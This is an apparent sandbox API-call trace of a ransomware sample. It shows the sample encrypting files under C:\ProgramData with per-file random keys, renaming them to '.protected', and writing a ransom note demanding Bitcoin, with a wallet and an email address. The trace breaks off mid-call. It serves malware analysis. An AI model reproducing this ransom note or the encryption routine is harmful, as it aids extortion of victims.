0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.466] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt") returned 63 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.466] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.466] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.466] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\RESTORE_FILES.txt") returned 54 [0072.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\wwansvc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.467] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.467] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.467] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.467] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.468] CloseHandle (hObject=0xa4) returned 1 [0072.468] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.468] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.469] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RESTORE_FILES.txt") returned 46 [0072.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.469] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.469] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.470] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.470] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.470] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.470] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0072.470] CloseHandle (hObject=0xac) returned 1 [0072.470] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files (x86)") returned -1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="$Recycle.bin") returned 1 [0072.470] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0072.470] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help") returned 33 [0072.470] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0072.470] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0072.470] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\*") returned 35 [0072.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.482] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\.") returned 35 [0072.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.482] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.483] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.483] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\..") returned 36 [0072.483] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.483] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.483] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Windows") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Program Files") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Program Files (x86)") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="$Recycle.bin") returned 1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="System Volume Information") returned -1 [0072.484] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrIW (lpFirst="Hx.hxn", lpSrch=".protected") returned 0x0 [0072.484] lstrcmpW (lpString1="Hx.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".txt") returned 0x0 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".rar") returned 0x0 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".zip") returned 0x0 [0072.484] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x186, lpOverlapped=0x0) returned 1 [0072.485] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.485] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x186, lpOverlapped=0x0) returned 1 [0072.485] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.485] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.485] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.485] CloseHandle (hObject=0xa4) returned 1 [0072.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.protected") returned 50 [0072.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.protected")) returned 1 [0072.486] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Windows") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Program Files") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.486] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.486] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.486] lstrcmpW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.487] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.488] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.488] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.488] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.489] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.489] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.489] CloseHandle (hObject=0xa4) returned 1 [0072.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected") returned 64 [0072.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.protected")) returned 1 [0072.490] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.491] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.491] lstrcmpW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.491] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.496] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.496] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.497] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.497] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.497] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.497] CloseHandle (hObject=0xa4) returned 1 [0072.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected") returned 68 [0072.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.protected")) returned 1 [0072.498] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Windows") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Program Files") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.498] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.498] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.498] lstrcmpW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.500] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, 